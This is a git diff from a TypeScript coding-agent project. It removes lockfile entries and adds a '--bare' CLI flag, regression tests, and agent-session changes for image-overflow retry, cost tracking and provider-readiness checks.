-    resolution: {integrity: sha512-bnly4BKB3KDTFxrUIcgCLbaeVVS8lrAkri1pEzskpmxu9MdfGQTy8b8EgcD83ywD3RPMsIulY8xJH5Awa+t9fA==}
-
-  '@tokenizer/inflate@0.4.1':
-    resolution: {integrity: sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA==}
-    engines: {node: '>=18'}
-
-  '@tokenizer/token@0.3.0':
-    resolution: {integrity: sha512-OvjF+z51L3ov0OyAU0duzsYuvO01PH7x4t6DJx+guahgTnBHkhJdG7soQeTSFLWN3efnHyibZ4Z8l2EuWwJN3A==}
-
-  '@types/diff@7.0.2':
-    resolution: {integrity: sha512-JSWRMozjFKsGlEjiiKajUjIJVKuKdE3oVy2DNtK+fUo8q82nhFZ2CPQwicAIkXrofahDXrWJ7mjelvZphMS98Q==}
-
-  '@types/emscripten@1.41.5':
-    resolution: {integrity: sha512-cMQm7pxu6BxtHyqJ7mQZ2kXWV5SLmugybFdHCBbJ5eHzOo6VhBckEgAT3//rP5FwPHNPeEiq4SmQ5ucBwsOo4Q==}
-
-  '@types/hosted-git-info@3.0.5':
-    resolution: {integrity: sha512-Dmngh7U003cOHPhKGyA7LWqrnvcTyILNgNPmNCxlx7j8MIi54iBliiT8XqVLIQ3GchoOjVAyBzNJVyuaJjqokg==}
-
-  '@types/node@25.5.0':
-    resolution: {integrity: sha512-jp2P3tQMSxWugkCUKLRPVUpGaL5MVFwF8RDuSRztfwgN1wmqJeMSbKlnEtQqU8UrhTmzEmZdu2I6v2dpp7XIxw==}
-
-  '@types/proper-lockfile@4.1.4':
-    resolution: {integrity: sha512-uo2ABllncSqg9F1D4nugVl9v93RmjxF6LJzQLMLDdPaXCUIDPeOJ21Gbqi43xNKzBi/WQ0Q0dICqufzQbMjipQ==}
-
-  '@types/retry@0.12.5':
-    resolution: {integrity: sha512-3xSjTp3v03X/lSQLkczaN9UIEwJMoMCA1+Nb5HfbJEQWogdeQIyVtTvxPXDQjZ5zws8rFQfVfRdz03ARihPJgw==}
-
-  '@types/sql.js@1.4.9':
-    resolution: {integrity: sha512-ep8b36RKHlgWPqjNG9ToUrPiwkhwh0AEzy883mO5Xnd+cL6VBH1EvSjBAAuxLUFF2Vn/moE3Me6v9E1Lo+48GQ==}
-
-  '@types/yauzl@2.10.3':
-    resolution: {integrity: sha512-oJoftv0LSuaDZE3Le4DbKX+KS9G36NzOeSap90UIK0yMA/NhKJhqlSGtNDORNRaIbQfzjXDrQa0ytJ6mNRGz/Q==}
-
-  ansi-regex@6.2.2:
-    resolution: {integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==}
-    engines: {node: '>=12'}
-
-  balanced-match@4.0.4:
-    resolution: {integrity: sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==}
-    engines: {node: 18 || 20 || >=22}
-
-  brace-expansion@5.0.4:
-    resolution: {integrity: sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==}
-    engines: {node: 18 || 20 || >=22}
-
-  buffer-crc32@0.2.13:
-    resolution: {integrity: sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ==}
-
-  chalk@5.6.2:
-    resolution: {integrity: sha512-7NzBL0rN6fMUW+f7A6Io4h40qQlG+xGmtMxfbnH/K7TAtt8JQWVQK+6g0UXKMeVJoyV5EkkNsErQ8pVD3bLHbA==}
-    engines: {node: ^12.17.0 || ^14.13 || >=16.0.0}
-
-  debug@4.4.3:
-    resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==}
-    engines: {node: '>=6.0'}
-    peerDependencies:
-      supports-color: '*'
-    peerDependenciesMeta:
-      supports-color:
-        optional: true
-
-  diff@8.0.3:
-    resolution: {integrity: sha512-qejHi7bcSD4hQAZE0tNAawRK1ZtafHDmMTMkrrIGgSLl7hTnQHmKCeB45xAcbfTqK2zowkM3j3bHt/4b/ARbYQ==}
-    engines: {node: '>=0.3.1'}
-
-  end-of-stream@1.4.5:
-    resolution: {integrity: sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==}
-
-  extract-zip@2.0.1:
-    resolution: {integrity: sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==}
-    engines: {node: '>= 10.17.0'}
-    hasBin: true
-
-  fd-slicer@1.1.0:
-    resolution: {integrity: sha512-cE1qsB/VwyQozZ+q1dGxR8LBYNZeofhEdUNGSMbQD3Gw2lAzX9Zb3uIU6Ebc/Fmyjo9AWWfnn0AUCHqtevs/8g==}
-
-  file-type@21.3.2:
-    resolution: {integrity: sha512-DLkUvGwep3poOV2wpzbHCOnSKGk1LzyXTv+aHFgN2VFl96wnp8YA9YjO2qPzg5PuL8q/SW9Pdi6WTkYOIh995w==}
-    engines: {node: '>=20'}
-
-  get-stream@5.2.0:
-    resolution: {integrity: sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==}
-    engines: {node: '>=8'}
-
-  glob@13.0.6:
-    resolution: {integrity: sha512-Wjlyrolmm8uDpm/ogGyXZXb1Z+Ca2B8NbJwqBVg0axK9GbBeoS7yGV6vjXnYdGm6X53iehEuxxbyiKp8QmN4Vw==}
-    engines: {node: 18 || 20 || >=22}
-
-  graceful-fs@4.2.11:
-    resolution: {integrity: sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==}
-
-  hosted-git-info@9.0.2:
-    resolution: {integrity: sha512-M422h7o/BR3rmCQ8UHi7cyyMqKltdP9Uo+J2fXK+RSAY+wTcKOIRyhTuKv4qn+DJf3g+PL890AzId5KZpX+CBg==}
-    engines: {node: ^20.17.0 || >=22.9.0}
-
-  ieee754@1.2.1:
-    resolution: {integrity: sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==}
-
-  ignore@7.0.5:
-    resolution: {integrity: sha512-Hs59xBNfUIunMFgWAbGX5cq6893IbWg4KnrjbYwX3tx0ztorVgTDA6B2sxf8ejHJ4wz8BqGUMYlnzNBer5NvGg==}
-    engines: {node: '>= 4'}
-
-  lru-cache@11.2.7:
-    resolution: {integrity: sha512-aY/R+aEsRelme17KGQa/1ZSIpLpNYYrhcrepKTZgE+W3WM16YMCaPwOHLHsmopZHELU0Ojin1lPVxKR0MihncA==}
-    engines: {node: 20 || >=22}
-
-  marked@15.0.12:
-    resolution: {integrity: sha512-8dD6FusOQSrpv9Z1rdNMdlSgQOIP880DHqnohobOmYLElGEqAL/JvxvuxZO16r4HtjTlfPRDC1hbvxC9dPN2nA==}
-    engines: {node: '>= 18'}
-    hasBin: true
-
-  minimatch@10.2.4:
-    resolution: {integrity: sha512-oRjTw/97aTBN0RHbYCdtF1MQfvusSIBQM0IZEgzl6426+8jSC0nF1a/GmnVLpfB9yyr6g6FTqWqiZVbxrtaCIg==}
-    engines: {node: 18 || 20 || >=22}
-
-  minipass@7.1.3:
-    resolution: {integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==}
-    engines: {node: '>=16 || 14 >=14.17'}
-
-  ms@2.1.3:
-    resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==}
-
-  once@1.4.0:
-    resolution: {integrity: sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==}
-
-  path-scurry@2.0.2:
-    resolution: {integrity: sha512-3O/iVVsJAPsOnpwWIeD+d6z/7PmqApyQePUtCndjatj/9I5LylHvt5qluFaBT3I5h3r1ejfR056c+FCv+NnNXg==}
-    engines: {node: 18 || 20 || >=22}
-
-  pend@1.2.0:
-    resolution: {integrity: sha512-F3asv42UuXchdzt+xXqfW1OGlVBe+mxa2mqI0pg5yAHZPvFmY3Y6drSf/GQ1A86WgWEN9Kzh/WrgKa6iGcHXLg==}
-
-  proper-lockfile@4.1.2:
-    resolution: {integrity: sha512-TjNPblN4BwAWMXU8s9AEz4JmQxnD1NNL7bNOY/AKUzyamc379FWASUhc/K1pL2noVb+XmZKLL68cjzLsiOAMaA==}
-
-  pump@3.0.4:
-    resolution: {integrity: sha512-VS7sjc6KR7e1ukRFhQSY5LM2uBWAUPiOPa/A3mkKmiMwSmRFUITt0xuj+/lesgnCv+dPIEYlkzrcyXgquIHMcA==}
-
-  retry@0.12.0:
-    resolution: {integrity: sha512-9LkiTwjUh6rT555DtE9rTX+BKByPfrMzEAtnlEtdEwr3Nkffwiihqe2bWADg+OQRjt9gl6ICdmB/ZFDCGAtSow==}
-    engines: {node: '>= 4'}
-
-  signal-exit@3.0.7:
-    resolution: {integrity: sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==}
-
-  sql.js@1.14.1:
-    resolution: {integrity: sha512-gcj8zBWU5cFsi9WUP+4bFNXAyF1iRpA3LLyS/DP5xlrNzGmPIizUeBggKa8DbDwdqaKwUcTEnChtd2grWo/x/A==}
-
-  std-env@3.10.0:
-    resolution: {integrity: sha512-5GS12FdOZNliM5mAOxFRg7Ir0pWz8MdpYm6AY6VPkGpbA7ZzmbzNcBJQ0GPvvyWgcY7QAhCgf9Uy89I03faLkg==}
-
-  strip-ansi@7.2.0:
-    resolution: {integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==}
-    engines: {node: '>=12'}
-
-  strtok3@10.3.4:
-    resolution: {integrity: sha512-KIy5nylvC5le1OdaaoCJ07L+8iQzJHGH6pWDuzS+d07Cu7n1MZ2x26P8ZKIWfbK02+XIL8Mp4RkWeqdUCrDMfg==}
-    engines: {node: '>=18'}
-
-  token-types@6.1.2:
-    resolution: {integrity: sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==}
-    engines: {node: '>=14.16'}
-
-  uint8array-extras@1.5.0:
-    resolution: {integrity: sha512-rvKSBiC5zqCCiDZ9kAOszZcDvdAHwwIKJG33Ykj43OKcWsnmcBRL09YTU4nOeHZ8Y2a7l1MgTd08SBe9A8Qj6A==}
-    engines: {node: '>=18'}
-
-  undici-types@7.18.2:
-    resolution: {integrity: sha512-AsuCzffGHJybSaRrmr5eHr81mwJU3kjw6M+uprWvCXiNeN9SOGwQ3Jn8jb8m3Z6izVgknn1R0FTCEAP2QrLY/w==}
-
-  undici@7.24.4:
-    resolution: {integrity: sha512-BM/JzwwaRXxrLdElV2Uo6cTLEjhSb3WXboncJamZ15NgUURmvlXvxa6xkwIOILIjPNo9i8ku136ZvWV0Uly8+w==}
-    engines: {node: '>=20.18.1'}
-
-  wrappy@1.0.2:
-    resolution: {integrity: sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==}
-
-  yaml@2.8.2:
-    resolution: {integrity: sha512-mplynKqc1C2hTVYxd0PU2xQAc22TI1vShAYGksCCfxbn/dFwnHTNi1bvYsBTkhdUNtGIf5xNOg938rrSSYvS9A==}
-    engines: {node: '>= 14.6'}
-    hasBin: true
-
-  yauzl@2.10.0:
-    resolution: {integrity: sha512-p4a9I6X6nu6IhoGmBqAcbJy1mlC4j27vEPZX9F4L4/vZT3Lyq1VkFHw/V/PUcB9Buo+DG3iHkT0x3Qya58zc3g==}
-
-  yoctocolors@2.1.2:
-    resolution: {integrity: sha512-CzhO+pFNo8ajLM2d2IW/R93ipy99LWjtwblvC1RsoSUMZgyLbYFr221TnSNT7GjGdYui6P459mw9JH/g/zW2ug==}
-    engines: {node: '>=18'}
-
-snapshots:
-
-  '@borewit/text-codec@0.2.2': {}
-
-  '@mariozechner/jiti@2.6.5':
-    dependencies:
-      std-env: 3.10.0
-      yoctocolors: 2.1.2
-
-  '@silvia-odwyer/photon-node@0.3.4': {}
-
-  '@tokenizer/inflate@0.4.1':
-    dependencies:
-      debug: 4.4.3
-      token-types: 6.1.2
-    transitivePeerDependencies:
-      - supports-color
-
-  '@tokenizer/token@0.3.0': {}
-
-  '@types/diff@7.0.2': {}
-
-  '@types/emscripten@1.41.5': {}
-
-  '@types/hosted-git-info@3.0.5': {}
-
-  '@types/node@25.5.0':
-    dependencies:
-      undici-types: 7.18.2
-
-  '@types/proper-lockfile@4.1.4':
-    dependencies:
-      '@types/retry': 0.12.5
-
-  '@types/retry@0.12.5': {}
-
-  '@types/sql.js@1.4.9':
-    dependencies:
-      '@types/emscripten': 1.41.5
-      '@types/node': 25.5.0
-
-  '@types/yauzl@2.10.3':
-    dependencies:
-      '@types/node': 25.5.0
-    optional: true
-
-  ansi-regex@6.2.2: {}
-
-  balanced-match@4.0.4: {}
-
-  brace-expansion@5.0.4:
-    dependencies:
-      balanced-match: 4.0.4
-
-  buffer-crc32@0.2.13: {}
-
-  chalk@5.6.2: {}
-
-  debug@4.4.3:
-    dependencies:
-      ms: 2.1.3
-
-  diff@8.0.3: {}
-
-  end-of-stream@1.4.5:
-    dependencies:
-      once: 1.4.0
-
-  extract-zip@2.0.1:
-    dependencies:
-      debug: 4.4.3
-      get-stream: 5.2.0
-      yauzl: 2.10.0
-    optionalDependencies:
-      '@types/yauzl': 2.10.3
-    transitivePeerDependencies:
-      - supports-color
-
-  fd-slicer@1.1.0:
-    dependencies:
-      pend: 1.2.0
-
-  file-type@21.3.2:
-    dependencies:
-      '@tokenizer/inflate': 0.4.1
-      strtok3: 10.3.4
-      token-types: 6.1.2
-      uint8array-extras: 1.5.0
-    transitivePeerDependencies:
-      - supports-color
-
-  get-stream@5.2.0:
-    dependencies:
-      pump: 3.0.4
-
-  glob@13.0.6:
-    dependencies:
-      minimatch: 10.2.4
-      minipass: 7.1.3
-      path-scurry: 2.0.2
-
-  graceful-fs@4.2.11: {}
-
-  hosted-git-info@9.0.2:
-    dependencies:
-      lru-cache: 11.2.7
-
-  ieee754@1.2.1: {}
-
-  ignore@7.0.5: {}
-
-  lru-cache@11.2.7: {}
-
-  marked@15.0.12: {}
-
-  minimatch@10.2.4:
-    dependencies:
-      brace-expansion: 5.0.4
-
-  minipass@7.1.3: {}
-
-  ms@2.1.3: {}
-
-  once@1.4.0:
-    dependencies:
-      wrappy: 1.0.2
-
-  path-scurry@2.0.2:
-    dependencies:
-      lru-cache: 11.2.7
-      minipass: 7.1.3
-
-  pend@1.2.0: {}
-
-  proper-lockfile@4.1.2:
-    dependencies:
-      graceful-fs: 4.2.11
-      retry: 0.12.0
-      signal-exit: 3.0.7
-
-  pump@3.0.4:
-    dependencies:
-      end-of-stream: 1.4.5
-      once: 1.4.0
-
-  retry@0.12.0: {}
-
-  signal-exit@3.0.7: {}
-
-  sql.js@1.14.1: {}
-
-  std-env@3.10.0: {}
-
-  strip-ansi@7.2.0:
-    dependencies:
-      ansi-regex: 6.2.2
-
-  strtok3@10.3.4:
-    dependencies:
-      '@tokenizer/token': 0.3.0
-
-  token-types@6.1.2:
-    dependencies:
-      '@borewit/text-codec': 0.2.2
-      '@tokenizer/token': 0.3.0
-      ieee754: 1.2.1
-
-  uint8array-extras@1.5.0: {}
-
-  undici-types@7.18.2: {}
-
-  undici@7.24.4: {}
-
-  wrappy@1.0.2: {}
-
-  yaml@2.8.2: {}
-
-  yauzl@2.10.0:
-    dependencies:
-      buffer-crc32: 0.2.13
-      fd-slicer: 1.1.0
-
-  yoctocolors@2.1.2: {}
diff --git a/packages/pi-coding-agent/src/cli/args.ts b/packages/pi-coding-agent/src/cli/args.ts
index 101e67da5..cd056d5d8 100644
--- a/packages/pi-coding-agent/src/cli/args.ts
+++ b/packages/pi-coding-agent/src/cli/args.ts
@@ -49,6 +49,8 @@ export interface Args {
 	fileArgs: string[];
 	/** Unknown flags (potentially extension flags) - map of flag name to value */
 	unknownFlags: Map<string, boolean | string>;
+	/** --bare: suppress CLAUDE.md/AGENTS.md, user skills, prompt templates, themes, project preferences */
+	bare?: boolean;
 }
 
 const VALID_THINKING_LEVELS = ["off", "minimal", "low", "medium", "high", "xhigh"] as const;
@@ -169,6 +171,8 @@ export function parseArgs(args: string[], extensionFlags?: Map<string, { type: "
 			}
 		} else if (arg === "--verbose") {
 			result.verbose = true;
+		} else if (arg === "--bare") {
+			result.bare = true;
 		} else if (arg === "--offline") {
 			result.offline = true;
 		} else if (arg.startsWith("@")) {
diff --git a/packages/pi-coding-agent/src/core/agent-session-model-switch.test.ts b/packages/pi-coding-agent/src/core/agent-session-model-switch.test.ts
new file mode 100644
index 000000000..f86dac6ca
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/agent-session-model-switch.test.ts
@@ -0,0 +1,21 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const source = readFileSync(join(process.cwd(), "packages/pi-coding-agent/src/core/agent-session.ts"), "utf-8");
+
+test("agent-session: explicit model switches cancel retry before applying new model", () => {
+	const start = source.indexOf("private async _applyModelChange(");
+	assert.ok(start >= 0, "missing _applyModelChange");
+	const window = source.slice(start, start + 900);
+	const abortIdx = window.indexOf("this._retryHandler.abortRetry();");
+	const setModelIdx = window.indexOf("this.agent.setModel(model);");
+
+	assert.ok(abortIdx >= 0, "_applyModelChange should cancel any in-flight retry");
+	assert.ok(setModelIdx >= 0, "_applyModelChange should set the new model");
+	assert.ok(
+		abortIdx < setModelIdx,
+		"retry cancellation must happen before applying the new model to prevent stale provider retries",
+	);
+});
diff --git a/packages/pi-coding-agent/src/core/agent-session-tool-refresh.test.ts b/packages/pi-coding-agent/src/core/agent-session-tool-refresh.test.ts
new file mode 100644
index 000000000..f1a14a15b
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/agent-session-tool-refresh.test.ts
@@ -0,0 +1,64 @@
+// GSD-2 — Regression tests for #3616: tool list persistence across newSession() calls
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import test, { describe } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const source = readFileSync(
+	join(process.cwd(), "packages/pi-coding-agent/src/core/agent-session.ts"),
+	"utf-8",
+);
+
+describe("#3616 — newSession() must restore full tool set", () => {
+	test("newSession() calls _refreshToolRegistry with includeAllExtensionTools when cwd is unchanged", () => {
+		// Find the newSession method
+		const newSessionStart = source.indexOf("async newSession(options?:");
+		assert.ok(newSessionStart >= 0, "should find newSession method");
+
+		// Get the method body (up to the next top-level method)
+		const methodBody = source.slice(newSessionStart, newSessionStart + 3000);
+
+		// Verify the cwd-changed branch rebuilds tools
+		assert.ok(
+			methodBody.includes("if (this._cwd !== previousCwd)"),
+			"should have cwd-change guard",
+		);
+
+		// Verify the else branch exists and refreshes tools with includeAllExtensionTools
+		const elseIdx = methodBody.indexOf("} else {");
+		assert.ok(elseIdx >= 0, "should have else branch for cwd-unchanged case");
+
+		const elseBranch = methodBody.slice(elseIdx, elseIdx + 800);
+		assert.ok(
+			elseBranch.includes("_refreshToolRegistry"),
+			"else branch should call _refreshToolRegistry",
+		);
+		assert.ok(
+			elseBranch.includes("includeAllExtensionTools: true"),
+			"else branch should pass includeAllExtensionTools: true to restore narrowed tools",
+		);
+	});
+
+	test("newSession() references #3616 in the else-branch comment", () => {
+		const idx = source.indexOf("#3616");
+		assert.ok(idx >= 0, "source should reference issue #3616 for the tool restore fix");
+	});
+
+	test("agent.reset() does not clear _state.tools (tools persist across reset)", () => {
+		// This is a structural invariant — if reset() starts clearing tools,
+		// the newSession() refresh becomes the only defense against tool loss.
+		const agentSource = readFileSync(
+			join(process.cwd(), "packages/pi-agent-core/src/agent.ts"),
+			"utf-8",
+		);
+		const resetStart = agentSource.indexOf("reset()");
+		assert.ok(resetStart >= 0, "should find reset() method");
+		const resetBody = agentSource.slice(resetStart, resetStart + 400);
+		assert.ok(
+			!resetBody.includes("tools"),
+			"reset() should NOT touch _state.tools — tools are managed by agent-session",
+		);
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/agent-session.ts b/packages/pi-coding-agent/src/core/agent-session.ts
index 03389954f..782ecd04e 100644
--- a/packages/pi-coding-agent/src/core/agent-session.ts
+++ b/packages/pi-coding-agent/src/core/agent-session.ts
@@ -72,6 +72,7 @@ import type { ModelRegistry } from "./model-registry.js";
 import { expandPromptTemplate, type PromptTemplate } from "./prompt-templates.js";
 import type { ResourceExtensionPaths, ResourceLoader } from "./resource-loader.js";
 import { RetryHandler } from "./retry-handler.js";
+import { isImageDimensionError, downsizeConversationImages } from "./image-overflow-recovery.js";
 import type { BranchSummaryEntry, SessionManager } from "./session-manager.js";
 import { getLatestCompactionEntry } from "./session-manager.js";
 import type { SettingsManager } from "./settings-manager.js";
@@ -136,7 +137,8 @@ export type AgentSessionEvent =
 	| { type: "auto_retry_end"; success: boolean; attempt: number; finalError?: string }
 	| { type: "fallback_provider_switch"; from: string; to: string; reason: string }
 	| { type: "fallback_provider_restored"; provider: string; reason: string }
-	| { type: "fallback_chain_exhausted"; reason: string };
+	| { type: "fallback_chain_exhausted"; reason: string }
+	| { type: "image_overflow_recovery"; strippedCount: number; imageCount: number };
 
 /** Listener function for agent session events */
 export type AgentSessionEventListener = (event: AgentSessionEvent) => void;
@@ -164,6 +166,9 @@ export interface AgentSessionConfig {
 	baseToolsOverride?: Record<string, AgentTool>;
 	/** Mutable ref used by Agent to access the current ExtensionRunner */
 	extensionRunnerRef?: { current?: ExtensionRunner };
+	/** Optional: check if the claude-code CLI provider is ready (installed + authed).
+	 * Passed through to RetryHandler for third-party block recovery (#3772). */
+	isClaudeCodeReady?: () => boolean;
 }
 
 export interface ExtensionBindings {
@@ -255,6 +260,10 @@ export class AgentSession {
 	private _cumulativeOutputTokens = 0;
 	private _cumulativeToolCalls = 0;
 
+	/** Cost of the most recent assistant response (for per-prompt display). */
+	private _lastTurnCost = 0;
+
+
 	// Bash execution state
 	private _bashAbortController: AbortController | undefined = undefined;
 	private _pendingBashMessages: BashExecutionMessage[] = [];
@@ -318,6 +327,7 @@ export class AgentSession {
 			getSessionId: () => this.sessionId,
 			emit: (event) => this._emit(event),
 			onModelChange: (model) => this.sessionManager.appendModelChange(model.provider, model.id),
+			isClaudeCodeReady: config.isClaudeCodeReady,
 		});
 
 		this._compactionOrchestrator = new CompactionOrchestrator({
@@ -454,6 +464,7 @@ export class AgentSession {
 
 				// Accumulate session stats that survive compaction (#1423)
 				const assistantMsg = event.message as AssistantMessage;
+				this._lastTurnCost = assistantMsg.usage?.cost?.total ?? 0;
 				this._cumulativeCost += assistantMsg.usage?.cost?.total ?? 0;
 				this._cumulativeInputTokens += assistantMsg.usage?.input ?? 0;
 				this._cumulativeOutputTokens += assistantMsg.usage?.output ?? 0;
@@ -482,6 +493,36 @@ export class AgentSession {
 				if (didRetry) return; // Retry was initiated, don't proceed to compaction
 			}
 
+			// Check for image dimension overflow (many-image 400 error).
+			// When a session accumulates many images, the API rejects requests
+			// whose images exceed the many-image dimension limit. Strip older
+			// images from the conversation and auto-retry. (#2874)
+			if (
+				msg.stopReason === "error" &&
+				isImageDimensionError(msg.errorMessage)
+			) {
+				const messages = this.agent.state.messages;
+				const result = downsizeConversationImages(messages as Message[]);
+				if (result.processed) {
+					// Remove the trailing error assistant message, then replace
+					if (messages.length > 0 && messages[messages.length - 1].role === "assistant") {
+						this.agent.replaceMessages(messages.slice(0, -1));
+					}
+
+					this._emit({
+						type: "image_overflow_recovery",
+						strippedCount: result.strippedCount,
+						imageCount: result.imageCount,
+					});
+
+					// Auto-retry after downsizing
+					setTimeout(() => {
+						this.agent.continue().catch(() => {});
+					}, 0);
+					return;
+				}
+			}
+
 			await this._compactionOrchestrator.checkCompaction(msg);
 		}
 	}
@@ -687,6 +728,8 @@ export class AgentSession {
 	 * Call this when completely done with the session.
 	 */
 	dispose(): void {
+		this._extensionErrorUnsubscriber?.();
+		this._extensionErrorUnsubscriber = undefined;
 		this._disconnectFromAgent();
 		this._eventListeners = [];
 	}
@@ -1047,9 +1090,8 @@ export class AgentSession {
 			});
 		}
 
-		// Validate API key
-		const apiKey = await this._modelRegistry.getApiKey(this.model, this.sessionId);
-		if (!apiKey) {
+		// Validate provider readiness
+		if (!this._modelRegistry.isProviderRequestReady(this.model.provider)) {
 			const isOAuth = this._modelRegistry.isUsingOAuth(this.model);
 			if (isOAuth) {
 				throw new Error(
@@ -1539,6 +1581,16 @@ export class AgentSession {
 				activeToolNames: this.getActiveToolNames(),
 				includeAllExtensionTools: true,
 			});
+		} else {
+			// Even when cwd hasn't changed, restore the full tool set (#3616).
+			// Extensions (e.g., discuss flows) may narrow the active tool list
+			// via setActiveTools() during a session. Without this refresh, the
+			// narrowed set persists into the next session — causing tools like
+			// gsd_plan_slice to be missing from auto-mode subagent sessions.
+			this._refreshToolRegistry({
+				activeToolNames: this.getActiveToolNames(),
+				includeAllExtensionTools: true,
+			});
 		}
 
 		// Run setup callback if provided (e.g., to append initial messages)
@@ -1595,6 +1647,10 @@ export class AgentSession {
 		options?: { persist?: boolean },
 	): Promise<void> {
 		const previousModel = this.model;
+		// Explicit model switches must cancel any in-flight retry loop from the
+		// previous provider/model. Otherwise stale provider backoff errors can
+		// continue to land after the user or runtime has already switched models.
+		this._retryHandler.abortRetry();
 		this.agent.setModel(model);
 		this.sessionManager.appendModelChange(model.provider, model.id);
 		if (options?.persist !== false) {
@@ -1607,12 +1663,11 @@ export class AgentSession {
 
 	/**
 	 * Set model directly.
-	 * Validates API key, saves to session and settings.
-	 * @throws Error if no API key available for the model
+	 * Validates provider readiness, saves to session and settings.
+	 * @throws Error if provider is not ready (missing credentials for apiKey/oauth providers)
 	 */
 	async setModel(model: Model<any>, options?: { persist?: boolean }): Promise<void> {
-		const apiKey = await this._modelRegistry.getApiKey(model, this.sessionId);
-		if (!apiKey) {
+		if (!this._modelRegistry.isProviderRequestReady(model.provider)) {
 			throw new Error(`No API key for ${model.provider}/${model.id}`);
 		}
 
@@ -1633,30 +1688,14 @@ export class AgentSession {
 		return this._cycleAvailableModel(direction, options);
 	}
 
-	private async _getScopedModelsWithApiKey(): Promise<Array<{ model: Model<any>; thinkingLevel?: ThinkingLevel }>> {
-		const apiKeysByProvider = new Map<string, string | undefined>();
-		const result: Array<{ model: Model<any>; thinkingLevel?: ThinkingLevel }> = [];
-
-		for (const scoped of this._scopedModels) {
-			const provider = scoped.model.provider;
-			let apiKey: string | undefined;
-			if (apiKeysByProvider.has(provider)) {
-				apiKey = apiKeysByProvider.get(provider);
-			} else {
-				apiKey = await this._modelRegistry.getApiKeyForProvider(provider, this.sessionId);
-				apiKeysByProvider.set(provider, apiKey);
-			}
-
-			if (apiKey) {
-				result.push(scoped);
-			}
-		}
-
-		return result;
+	private _getReadyScopedModels(): Array<{ model: Model<any>; thinkingLevel?: ThinkingLevel }> {
+		return this._scopedModels.filter((scoped) =>
+			this._modelRegistry.isProviderRequestReady(scoped.model.provider),
+		);
 	}
 
 	private async _cycleScopedModel(direction: "forward" | "backward", options?: { persist?: boolean }): Promise<ModelCycleResult | undefined> {
-		const scopedModels = await this._getScopedModelsWithApiKey();
+		const scopedModels = this._getReadyScopedModels();
 		if (scopedModels.length <= 1) return undefined;
 
 		const currentModel = this.model;
@@ -1687,11 +1726,6 @@ export class AgentSession {
 		const nextIndex = direction === "forward" ? (currentIndex + 1) % len : (currentIndex - 1 + len) % len;
 		const nextModel = availableModels[nextIndex];
 
-		const apiKey = await this._modelRegistry.getApiKey(nextModel, this.sessionId);
-		if (!apiKey) {
-			throw new Error(`No API key for ${nextModel.provider}/${nextModel.id}`);
-		}
-
 		const thinkingLevel = this._getThinkingLevelForModelSwitch();
 		await this._applyModelChange(nextModel, thinkingLevel, "cycle", options);
 
@@ -1928,7 +1962,11 @@ export class AgentSession {
 		runner.setUIContext(this._extensionUIContext);
 		runner.bindCommandContext(this._extensionCommandContextActions);
 
-		this._extensionErrorUnsubscriber?.();
+		try {
+			this._extensionErrorUnsubscriber?.();
+		} catch {
+			// Ignore errors from previous unsubscriber
+		}
 		this._extensionErrorUnsubscriber = this._extensionErrorListener
 			? runner.onError(this._extensionErrorListener)
 			: undefined;
